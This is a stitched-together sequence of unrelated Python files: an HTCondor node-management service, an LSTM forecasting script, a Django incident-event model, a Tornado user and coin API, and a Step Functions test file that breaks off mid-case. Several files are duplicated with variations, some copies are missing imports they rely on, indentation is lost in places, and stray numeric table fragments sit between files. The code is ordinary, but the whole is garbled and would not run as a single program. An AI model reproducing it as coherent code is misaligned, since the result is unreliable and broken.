"""Delete all nodes and switch to status STOPPED"""
self.controller.delete_nodes(self.nodes)
self.nodes = [] # Not only delete the nodes, but clear the list too
self.state = self.S_STOPPED
def __check_count_in_args(self, kwargs):
"""Return 'count' if all is good. HttpErrorResponse otherwise."""
# The frontend sends count under 'node'.
if 'node' in kwargs:
kwargs['count'] = kwargs['node']
if not 'count' in kwargs:
return HttpErrorResponse(self.REQUIRED_ARG_MSG % { 'arg': 'count' })
if not isinstance(kwargs['count'], int):
return HttpErrorResponse(
"ERROR: Expected an integer value for 'count'")
return int(kwargs['count'])
@expose('POST')
def add_nodes(self, kwargs):
"""Add kwargs['count'] nodes to this deployment"""
self.controller.add_context_replacement(dict(STRING='htcondor'))
# Adding nodes makes sense only in the RUNNING state
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'add_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Ensure 'count' is valid
count_or_err = self.__check_count_in_args(kwargs)
if isinstance(count_or_err, HttpErrorResponse):
return count_or_err
count = count_or_err
self.state = self.S_ADAPTING
Thread(target=self._do_add_nodes, args=[count, kwargs['cloud']]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_add_nodes(self, count, cloud):
"""Add 'count' HTCondor Nodes to this deployment"""
startCloud = self._init_cloud(cloud)
vals = { 'action': '_do_add_nodes', 'count': count }
self.logger.debug(self.ACTION_REQUESTING_NODES % vals)
node_instances = self.controller.create_nodes(count,
client.check_agent_process, self.AGENT_PORT, startCloud)
# Startup agents
for node in node_instances:
client.create_node(node.ip, self.AGENT_PORT, self.hub_ip)
self.logger.info("Added node %s: %s " % (node.id, node.ip))
node_info.add_node_info('/etc/hosts', node.ip, node.id)
self.nodes += node_instances
self.state = self.S_RUNNING
@expose('POST')
def remove_nodes(self, kwargs):
"""Remove kwargs['count'] nodes from this deployment"""
# Removing nodes only if RUNNING
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'remove_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Ensure 'count' is valid
count_or_err = self.__check_count_in_args(kwargs)
if isinstance(count_or_err, HttpErrorResponse):
return count_or_err
count = count_or_err
if count > len(self.nodes) - 1:
return HttpErrorResponse("ERROR: Cannot remove so many nodes")
self.state = self.S_ADAPTING
Thread(target=self._do_remove_nodes, args=[count]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_remove_nodes(self, count):
"""Remove 'count' nodes, starting from the end of the list. This way
the HTCondor Hub gets removed last."""
for _ in range(count):
node = self.nodes.pop()
self.logger.info("Removing node with IP %s" % node.ip)
self.controller.delete_nodes([ node ])
node_info.remove_node_info('/etc/hosts', node.ip)
self.state = self.S_RUNNING
def __is_hub(self, node):
"""Return True if the given node is the HTCondor Hub"""
return node.ip == self.hub_ip
@expose('GET')
def list_nodes(self, kwargs):
"""Return a list of running nodes"""
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'list_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
htcondor_nodes = [
node.id for node in self.nodes if not self.__is_hub(node)
]
htcondor_hub = [
node.id for node in self.nodes if self.__is_hub(node)
]
return HttpJsonResponse({
'hub': htcondor_hub,
'node': htcondor_nodes
})
    @expose('GET')
    def get_service_info(self, kwargs):
        """Return the service state and type"""
        # 'kwargs' is accepted for handler-signature uniformity; unused here.
        return HttpJsonResponse({'state': self.state, 'type': 'htcondor'})
@expose('GET')
def get_node_info(self, kwargs):
"""Return information about the node identified by the given
kwargs['serviceNodeId']"""
# serviceNodeId is a required parameter
if 'serviceNodeId' not in kwargs:
vals = { 'arg': 'serviceNodeId' }
return HttpErrorResponse(self.REQUIRED_ARG_MSG % vals)
serviceNodeId = kwargs.pop('serviceNodeId')
serviceNode = None
for node in self.nodes:
if serviceNodeId == node.id:
serviceNode = node
break
if serviceNode is None:
return HttpErrorResponse(
'ERROR: Cannot find node with serviceNode=%s' % serviceNodeId)
return HttpJsonResponse({
'serviceNode': {
'id': serviceNode.id,
'ip': serviceNode.ip,
'is_hub': self.__is_hub(serviceNode)
}
}) | 0.603348 | 0.145874 |
import os
import json
import time
import math
import matplotlib.pyplot as plt
from core.data_processor import DataLoader
from core.model import Model
def plot_results(predicted_data, true_data):
    """Plot the predicted series on top of the true series and show it."""
    figure = plt.figure(facecolor='white')
    axes = figure.add_subplot(111)
    axes.plot(true_data, label='True Data')
    # Draw the prediction on the same (current) axes as the true data.
    axes.plot(predicted_data, label='Prediction')
    plt.legend()
    plt.show()
def plot_results_multiple(predicted_data, true_data, prediction_len):
    """Plot several multi-step prediction windows against the true series."""
    figure = plt.figure(facecolor='white')
    axes = figure.add_subplot(111)
    axes.plot(true_data, label='True Data')
    # Pad each prediction window with leading Nones so it lines up with the
    # point in the true series where that window's forecast begins.
    for window_index, window in enumerate(predicted_data):
        padding = [None] * (window_index * prediction_len)
        plt.plot(padding + window, label='Prediction')
    plt.legend()
    plt.show()
def main():
    """Train an LSTM on the configured time series and plot its forecasts.

    All settings come from config.json. Trains via the out-of-memory batch
    generator, then plots multi-sequence predictions over the test split.
    """
    configs = json.load(open('config.json', 'r'))
    if not os.path.exists(configs['model']['save_dir']): os.makedirs(configs['model']['save_dir'])
    data = DataLoader(
        os.path.join('data', configs['data']['filename']),
        configs['data']['train_test_split'],
        configs['data']['columns']
    )
    model = Model()
    model.build_model(configs)
    # x/y are built here but only consumed by the disabled in-memory path.
    x, y = data.get_train_data(
        seq_len=configs['data']['sequence_length'],
        normalise=configs['data']['normalise']
    )
    '''
    # in-memory training
    model.train(
        x,
        y,
        epochs = configs['training']['epochs'],
        batch_size = configs['training']['batch_size'],
        save_dir = configs['model']['save_dir']
    )
    '''
    # out-of memory generative training
    # One epoch must cover every training window exactly once.
    steps_per_epoch = math.ceil((data.len_train - configs['data']['sequence_length']) / configs['training']['batch_size'])
    model.train_generator(
        data_gen=data.generate_train_batch(
            seq_len=configs['data']['sequence_length'],
            batch_size=configs['training']['batch_size'],
            normalise=configs['data']['normalise']
        ),
        epochs=configs['training']['epochs'],
        batch_size=configs['training']['batch_size'],
        steps_per_epoch=steps_per_epoch,
        save_dir=configs['model']['save_dir']
    )
    x_test, y_test = data.get_test_data(
        seq_len=configs['data']['sequence_length'],
        normalise=configs['data']['normalise']
    )
    # Multi-window forecasting; alternative prediction modes kept below.
    predictions = model.predict_sequences_multiple(x_test, configs['data']['sequence_length'], configs['data']['sequence_length'])
    # predictions = model.predict_sequence_full(x_test, configs['data']['sequence_length'])
    # predictions = model.predict_point_by_point(x_test)
    plot_results_multiple(predictions, y_test, configs['data']['sequence_length'])
    # plot_results(predictions, y_test)
# Script entry point. The original line was corrupted by a stray dataset
# artifact ("| Finance/... | import os") that made it a syntax error.
if __name__ == '__main__':
    main()
import json
import time
import math
import matplotlib.pyplot as plt
from core.data_processor import DataLoader
from core.model import Model
def plot_results(predicted_data, true_data):
    """Overlay the predicted series on the true series in one figure."""
    fig = plt.figure(facecolor='white')
    ax = fig.add_subplot(111)
    ax.plot(true_data, label='True Data')
    # plt.plot targets the current axes, i.e. the same 'ax' created above.
    plt.plot(predicted_data, label='Prediction')
    plt.legend()
    plt.show()
def plot_results_multiple(predicted_data, true_data, prediction_len):
    """Plot several multi-step prediction windows against the true series."""
    fig = plt.figure(facecolor='white')
    ax = fig.add_subplot(111)
    ax.plot(true_data, label='True Data')
    # Pad each prediction list with leading Nones to shift it to its
    # correct start position along the true series.
    for i, data in enumerate(predicted_data):
        padding = [None for p in range(i * prediction_len)]
        plt.plot(padding + data, label='Prediction')
    plt.legend()
    plt.show()
def main():
    """Build, train and evaluate the LSTM described by config.json."""
    configs = json.load(open('config.json', 'r'))
    if not os.path.exists(configs['model']['save_dir']): os.makedirs(configs['model']['save_dir'])
    data = DataLoader(
        os.path.join('data', configs['data']['filename']),
        configs['data']['train_test_split'],
        configs['data']['columns']
    )
    model = Model()
    model.build_model(configs)
    # Only the disabled in-memory training path below uses x/y.
    x, y = data.get_train_data(
        seq_len=configs['data']['sequence_length'],
        normalise=configs['data']['normalise']
    )
    '''
    # in-memory training
    model.train(
        x,
        y,
        epochs = configs['training']['epochs'],
        batch_size = configs['training']['batch_size'],
        save_dir = configs['model']['save_dir']
    )
    '''
    # out-of memory generative training
    # steps_per_epoch makes one epoch traverse all training windows once.
    steps_per_epoch = math.ceil((data.len_train - configs['data']['sequence_length']) / configs['training']['batch_size'])
    model.train_generator(
        data_gen=data.generate_train_batch(
            seq_len=configs['data']['sequence_length'],
            batch_size=configs['training']['batch_size'],
            normalise=configs['data']['normalise']
        ),
        epochs=configs['training']['epochs'],
        batch_size=configs['training']['batch_size'],
        steps_per_epoch=steps_per_epoch,
        save_dir=configs['model']['save_dir']
    )
    x_test, y_test = data.get_test_data(
        seq_len=configs['data']['sequence_length'],
        normalise=configs['data']['normalise']
    )
    predictions = model.predict_sequences_multiple(x_test, configs['data']['sequence_length'], configs['data']['sequence_length'])
    # predictions = model.predict_sequence_full(x_test, configs['data']['sequence_length'])
    # predictions = model.predict_point_by_point(x_test)
    plot_results_multiple(predictions, y_test, configs['data']['sequence_length'])
    # plot_results(predictions, y_test)
# Script entry point. The original 'main()' line carried a stray dataset
# artifact ("| 0.389082 | 0.449997") that corrupted the expression.
if __name__ == '__main__':
    main()
from django.db import models
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import User
import enum
import uuid
class EventAction(enum.Enum):
    """Kinds of actions an Event row can record on an incident timeline."""
    CREATED = "Created"
    GENERIC_UPDATE = "Generic Update"
    ATTRIBUTE_CHANGE_REQUESTED = "Attribute change requested"
    ATTRIBUTE_CHANGE_APPROVED = "Attribute change approved"
    ATTRIBUTE_CHANGED = "Attribute changed"
    ATTRIBUTE_CHANGE_REJECTED = "Attribute change rejected"
    COMMENTED = "Commented"
    OUTCOME_ADDED = "Outcome added"
    ENTITY_ASSIGNED = "Entity assigned"
    ENTITY_REMOVED = "Entity removed"
    ACTION_STARTED = "Started Action"
    ACTION_COMPLETED = "Ended Action"
    MEDIA_ATTACHED = "Media Attached"
    WORKFLOW_ACTIONED = "Workflow Actioned"
    def __str__(self):
        # Render the symbolic name (e.g. "CREATED"), not the display label.
        return self.name
class AffectedAttribute(enum.Enum):
    """Incident attributes that an Event may modify."""
    STATUS = "Status"
    SEVERITY = "Severity"
    OUTCOME = "Outcome"
    def __str__(self):
        # Render the symbolic name (e.g. "STATUS"), not the display label.
        return self.name
class Event(models.Model):
    """Audit-trail entry describing something that happened to an incident."""
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    # action type for the event, refer enums
    action = models.CharField(max_length=50, choices=[(tag.name, tag.value) for tag in EventAction])
    # refers to an external entity, ex: comment, media, outcome
    reference_id = models.IntegerField(null=True, blank=True)
    refered_model_type = models.ForeignKey(ContentType, on_delete=models.DO_NOTHING, null=True, blank=True)
    refered_model = GenericForeignKey('refered_model_type', 'reference_id')
    # refers to an event linked to the current event i.e for an ATTRIBUTE_CHANGED
    # event or an ATTRIBUTE_CHANGE_REJECTED event previously occured
    # ATTRIBUTE_CHANGE_REQUESTED event's id
    linked_event = models.ForeignKey("Event", on_delete=models.DO_NOTHING, null=True, blank=True)
    # specifies additional details
    description = models.TextField(null=True, blank=True)
    # event initiator - should be a user
    initiator = models.ForeignKey(User, on_delete=models.DO_NOTHING)
    # incident related to the event
    incident = models.ForeignKey("incidents.Incident", on_delete=models.DO_NOTHING)
    # attribute changed by the current event action
    affected_attribute = models.CharField(max_length=50, choices=[(tag.name, tag.value) for tag in AffectedAttribute], null=True, blank=True)
    created_date = models.DateTimeField(auto_now_add=True)

    class Meta:
        # Chronological order so an incident's timeline reads oldest-first.
        # (The original last line was corrupted by a stray dataset artifact.)
        ordering = ('created_date',)
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import User
import enum
import uuid
class EventAction(enum.Enum):
    """Enumeration of the action types an Event can record."""
    CREATED = "Created"
    GENERIC_UPDATE = "Generic Update"
    ATTRIBUTE_CHANGE_REQUESTED = "Attribute change requested"
    ATTRIBUTE_CHANGE_APPROVED = "Attribute change approved"
    ATTRIBUTE_CHANGED = "Attribute changed"
    ATTRIBUTE_CHANGE_REJECTED = "Attribute change rejected"
    COMMENTED = "Commented"
    OUTCOME_ADDED = "Outcome added"
    ENTITY_ASSIGNED = "Entity assigned"
    ENTITY_REMOVED = "Entity removed"
    ACTION_STARTED = "Started Action"
    ACTION_COMPLETED = "Ended Action"
    MEDIA_ATTACHED = "Media Attached"
    WORKFLOW_ACTIONED = "Workflow Actioned"
    def __str__(self):
        # String form is the member name, not the human-readable value.
        return self.name
class AffectedAttribute(enum.Enum):
    """Enumeration of the incident attributes an Event may change."""
    STATUS = "Status"
    SEVERITY = "Severity"
    OUTCOME = "Outcome"
    def __str__(self):
        # String form is the member name, not the human-readable value.
        return self.name
class Event(models.Model):
    """Immutable audit record tied to an incident and its initiating user."""
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    # action type for the event, refer enums
    action = models.CharField(max_length=50, choices=[(tag.name, tag.value) for tag in EventAction])
    # refers to an external entity, ex: comment, media, outcome
    reference_id = models.IntegerField(null=True, blank=True)
    refered_model_type = models.ForeignKey(ContentType, on_delete=models.DO_NOTHING, null=True, blank=True)
    refered_model = GenericForeignKey('refered_model_type', 'reference_id')
    # refers to an event linked to the current event i.e for an ATTRIBUTE_CHANGED
    # event or an ATTRIBUTE_CHANGE_REJECTED event previously occured
    # ATTRIBUTE_CHANGE_REQUESTED event's id
    linked_event = models.ForeignKey("Event", on_delete=models.DO_NOTHING, null=True, blank=True)
    # specifies additional details
    description = models.TextField(null=True, blank=True)
    # event initiator - should be a user
    initiator = models.ForeignKey(User, on_delete=models.DO_NOTHING)
    # incident related to the event
    incident = models.ForeignKey("incidents.Incident", on_delete=models.DO_NOTHING)
    # attribute changed by the current event action
    affected_attribute = models.CharField(max_length=50, choices=[(tag.name, tag.value) for tag in AffectedAttribute], null=True, blank=True)
    created_date = models.DateTimeField(auto_now_add=True)

    class Meta:
        # Oldest-first ordering for timeline views.
        # (The original last line was corrupted by a stray dataset artifact.)
        ordering = ('created_date',)
import logging
import datetime
import tornado.escape
from config import BaseController
from config.dmls_api import USERS
class UserRankController(BaseController):
    """/v1/user_rank"""
    def get(self):
        # 'limit' caps how many top users the ranking query returns.
        limit = self.get_argument("limit")
        rank_list = self.select_all(USERS["USER_RANK"], {"limit": limit})
        self.write(dict(rank_list=rank_list))
class TargetUserRankController(BaseController):
    """/v1/target_user_rank"""
    def get(self):
        """Return the 1-based rank of the user identified by 'w_id'.

        A user not present in the ranking is reported at position
        len(rank_list), matching the previous fall-through behaviour.
        The old loop raised NameError when the ranking was empty
        ('user_pos' was never bound); this version returns 0 instead.
        """
        w_id = self.get_argument("w_id")
        rank_list = self.select_all(USERS["ALL_RANK"], {})
        # Default: one past the last rank, i.e. "not in the ranking".
        user_pos = len(rank_list)
        for index, row in enumerate(rank_list):
            if row["w_id"] == w_id:
                user_pos = index + 1
                break
        self.write(dict(user_pos=user_pos))
class UserSignupController(BaseController):
    """/v1/user_signup"""
    def post(self):
        """Create a user record unless one already exists for this w_id."""
        params = {
            "user_name": self.get_argument("user_name"),
            "avatar": self.get_argument("avatar"),
            "w_id": self.get_argument("w_id"),
        }
        existing = self.find_data(USERS["FIND_USER"], params)
        if existing:
            # user exist, then FE should jump to "/v1/get_coins"
            ret = 2
        else:
            # insert_data reports the outcome of the INSERT.
            ret = self.insert_data(USERS["USER_INSERT"], params)
        self.write(dict(ret=ret))
class UserSigninController(BaseController):
    """/v1/user_signin"""
    def post(self):
        """Sign a user in and report whether a daily login bonus is due."""
        w_id = self.get_argument("w_id")
        params = {"w_id": w_id}
        user_data = self.find_data(USERS["FIND_USER"], params)
        ret = 1  # default: user not found
        if user_data:
            ret = 0
            # Compare calendar days (both timestamps truncated to midnight)
            # so the bonus unlocks once per day, not per 24h interval.
            current_time = datetime.datetime.combine(
                self.current_time_obj(),
                datetime.time.min
            )
            get_coin_time = datetime.datetime.combine(
                user_data["get_login_coin_time"],
                datetime.time.min
            )
            need_coins = (current_time - get_coin_time).days >= 1
            # logging.warn() is deprecated; logging.warning() is the
            # documented spelling with identical behaviour.
            logging.warning(current_time)
            logging.warning(user_data["get_login_coin_time"])
            logging.warning((current_time - get_coin_time).days)
            # Strip fields the client does not need before responding.
            del user_data["create_time"]
            del user_data["get_login_coin_time"]
            self.write(dict(ret=ret, user_data=user_data, need_coins=need_coins))
        else:
            self.write(dict(ret=ret))
class UserInfo(BaseController):
    """/v1/user_info/([0-9]+)"""
    def get(self, user_id):
        # URL captures arrive as strings; the query expects an integer id.
        user_id = int(user_id)
        params = {"challenger_id": user_id}
        user_info = self.select_all(USERS["USER_INFO"], params)
        # NOTE(review): raises IndexError when no row matches user_id --
        # confirm whether an error response should be returned instead.
        user_info = user_info[0]
        self.write(dict(user_info=user_info))
class GetCoinsController(BaseController):
    """/v1/get_coins"""
    def post(self):
        """Credit coins to a user; optionally stamp the daily login bonus.

        The original last line was corrupted by a stray dataset artifact
        ("| apis/user.py | import logging"), removed here.
        """
        w_id = self.get_argument("w_id")
        coins = self.get_argument("coins")
        # Request arguments are strings; parse the intended boolean
        # explicitly so values like "false" or "0" are not treated as True.
        login = self.get_argument("login").lower() in ("1", "true", "yes")
        params = {"w_id": w_id}
        user_data = self.find_data(USERS["FIND_USER"], params)
        ret = 1  # default: user not found
        if user_data:
            ret = 0
            coin_params = {
                "user_id": user_data["id"],
                "coins": coins
            }
            ret = self.update_data(USERS["COIN_UPDATE"], coin_params)
            if login:
                # Record when the login bonus was granted so the next
                # sign-in can tell whether a fresh daily bonus is due.
                login_params = {
                    "user_id": user_data["id"],
                    "current_time": self.current_time()
                }
                ret = self.update_data(USERS["LOGIN_COIN_TIME_UPDATE"], login_params)
        self.write(dict(ret=ret))
import datetime
import tornado.escape
from config import BaseController
from config.dmls_api import USERS
class UserRankController(BaseController):
    """/v1/user_rank"""
    def get(self):
        # Return the top 'limit' users according to the ranking query.
        limit = self.get_argument("limit")
        rank_list = self.select_all(USERS["USER_RANK"], {"limit": limit})
        self.write(dict(rank_list=rank_list))
class TargetUserRankController(BaseController):
    """/v1/target_user_rank"""
    def get(self):
        """Return the 1-based rank of the user identified by 'w_id'.

        Previously 'user_pos' was unbound when the ranking was empty,
        raising NameError; an empty ranking now yields position 0, and a
        missing user yields len(rank_list) as before.
        """
        w_id = self.get_argument("w_id")
        rank_list = self.select_all(USERS["ALL_RANK"], {})
        user_pos = len(rank_list)
        for index, row in enumerate(rank_list):
            if row["w_id"] == w_id:
                user_pos = index + 1
                break
        self.write(dict(user_pos=user_pos))
class UserSignupController(BaseController):
    """/v1/user_signup"""
    def post(self):
        # Collect the new user's profile fields from the request body.
        user_name = self.get_argument("user_name")
        avatar = self.get_argument("avatar")
        w_id = self.get_argument("w_id")
        params = {"user_name": user_name, "avatar": avatar, "w_id": w_id}
        user_data = self.find_data(USERS["FIND_USER"], params)
        ret = 1 # fallback return code when neither branch applies
        if user_data:
            ret = 2 # user exist, then FE should jump to "/v1/get_coins"
        else:
            ret = self.insert_data(USERS["USER_INSERT"], params)
        # self.write(dict(ret=ret))
        self.write(dict(ret=ret))
class UserSigninController(BaseController):
    """/v1/user_signin"""
    def post(self):
        """Look up the user by w_id and report daily-bonus eligibility."""
        w_id = self.get_argument("w_id")
        params = {"w_id": w_id}
        user_data = self.find_data(USERS["FIND_USER"], params)
        ret = 1  # default: user not found
        if user_data:
            ret = 0
            # Truncate both timestamps to midnight: eligibility is per
            # calendar day rather than per 24-hour interval.
            current_time = datetime.datetime.combine(
                self.current_time_obj(),
                datetime.time.min
            )
            get_coin_time = datetime.datetime.combine(
                user_data["get_login_coin_time"],
                datetime.time.min
            )
            need_coins = (current_time - get_coin_time).days >= 1
            # Replaced deprecated logging.warn with logging.warning.
            logging.warning(current_time)
            logging.warning(user_data["get_login_coin_time"])
            logging.warning((current_time - get_coin_time).days)
            # Internal bookkeeping fields are not sent to the client.
            del user_data["create_time"]
            del user_data["get_login_coin_time"]
            self.write(dict(ret=ret, user_data=user_data, need_coins=need_coins))
        else:
            self.write(dict(ret=ret))
class UserInfo(BaseController):
    """/v1/user_info/([0-9]+)"""
    def get(self, user_id):
        # Convert the string URL capture to the integer id the query needs.
        user_id = int(user_id)
        params = {"challenger_id": user_id}
        user_info = self.select_all(USERS["USER_INFO"], params)
        # NOTE(review): [0] raises IndexError for an unknown user_id --
        # verify whether callers rely on that or expect an error payload.
        user_info = user_info[0]
        self.write(dict(user_info=user_info))
class GetCoinsController(BaseController):
    """/v1/get_coins"""
    def post(self):
        """Credit coins to a user; optionally stamp the daily login bonus.

        The original final line carried a stray dataset artifact
        ("| 0.256925 | 0.070464"), removed here.
        """
        w_id = self.get_argument("w_id")
        coins = self.get_argument("coins")
        # Arguments are strings: interpret the boolean explicitly so
        # "false"/"0" are not treated as truthy.
        login = self.get_argument("login").lower() in ("1", "true", "yes")
        params = {"w_id": w_id}
        user_data = self.find_data(USERS["FIND_USER"], params)
        ret = 1  # default: user not found
        if user_data:
            ret = 0
            coin_params = {
                "user_id": user_data["id"],
                "coins": coins
            }
            ret = self.update_data(USERS["COIN_UPDATE"], coin_params)
            if login:
                # Stamp the bonus time so sign-in can compute eligibility.
                login_params = {
                    "user_id": user_data["id"],
                    "current_time": self.current_time()
                }
                ret = self.update_data(USERS["LOGIN_COIN_TIME_UPDATE"], login_params)
        self.write(dict(ret=ret))
import unittest
from .util import StateTestCase
class TestTaskState(StateTestCase):
"""Tests for the Task state"""
SUCCESSFUL_CASES = [
(
"Should include a basic task",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should set lambda service",
"""
class Action(Task):
service = "lambda"
async def run(event, context):
return
def main(data):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should set lambda:pexpm-runner service",
"""
class Action(Task):
service = "lambda:pexpm-runner"
async def run(event, context):
return
def main(data):
Action(key="action")
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"package_name": "${PackageNameAction}",
"package_version": "${PackageVersionAction}",
"command": ["${PackageNameAction}", "run"],
"include_parent_environment": True,
"return_stdout": True,
"environment": {
"SFN_EXECUTION_NAME.$": "$$.Execution.Name",
"SFN_STATE_NAME.$": "$$.State.Name",
"SFN_STATE_MACHINE_NAME.$": "$$.StateMachine.Name",
"TRACE_ID.$": "$.__trace.id",
"TRACE_SOURCE.$": "$.__trace.source",
"SFN_INPUT_VALUE.$": "$",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should set ecs service",
"""
class Action(Task):
service = "ecs"
async def run(event, context):
return
def main(data):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "arn:aws:states:::ecs:runTask.sync",
"Parameters": {
"LaunchType": "FARGATE",
"Cluster": "${ECSClusterArn}",
"TaskDefinition": "${ECSTaskDefinitionAction}",
"NetworkConfiguration": {
"AwsvpcConfiguration": {
"AssignPublicIp": "DISABLED",
"SecurityGroups": [
"${DatabaseSecurityGroup}",
"${PrivateLoadBalancerSecurityGroup}",
],
"Subnets": [
"${Subnet0}",
"${Subnet1}",
"${Subnet2}",
"${Subnet3}",
],
}
},
"Overrides": {
"ContainerOverrides": [
{
"Name": "Action",
"Environment": [
{
"Name": "SFN_EXECUTION_NAME",
"Value.$": "$$.Execution.Name",
},
{
"Name": "SFN_STATE_NAME",
"Value.$": "$$.State.Name",
},
{
"Name": "SFN_STATE_MACHINE_NAME",
"Value.$": "$$.StateMachine.Name",
},
{
"Name": "TRACE_ID",
"Value.$": "$.__trace.id",
},
{
"Name": "TRACE_SOURCE",
"Value.$": "$.__trace.source",
},
],
}
]
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
}
},
},
),
(
"Should set ecs:worker service",
"""
class Action(Task):
service = "ecs:worker"
async def run(event, context):
return
def main(data):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "arn:aws:states:::sqs:sendMessage.waitForTaskToken",
"Parameters": {
"QueueUrl": "${QueueUrlAction}",
"MessageGroupId.$": "States.Format('{}_{}', $$.Execution.Name, $$.State.EnteredTime)",
"MessageAttributes": {
"SFN_EXECUTION_NAME": {
"DataType": "String",
"StringValue.$": "$$.Execution.Name",
},
"SFN_STATE_NAME": {
"DataType": "String",
"StringValue.$": "$$.State.Name",
},
"SFN_STATE_MACHINE_NAME": {
"DataType": "String",
"StringValue.$": "$$.StateMachine.Name",
},
# Pass tracing metadata from the input data object
"TRACE_ID": {
"DataType": "String",
"StringValue.$": "$.__trace.id",
},
"TRACE_SOURCE": {
"DataType": "String",
"StringValue.$": "$.__trace.source",
},
},
"MessageBody": {
"Input.$": "$",
"TaskToken.$": "$$.Task.Token",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
}
},
},
),
(
"Should accept key option",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(key="action")
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should accept timeout option",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(key="action", timeout=10)
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 10,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should accept input data",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(data["input"], key="action")
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$['input']",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should set result path",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
data["output"] = Action(data["input"], key="action")
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$['input']",
"meta": {
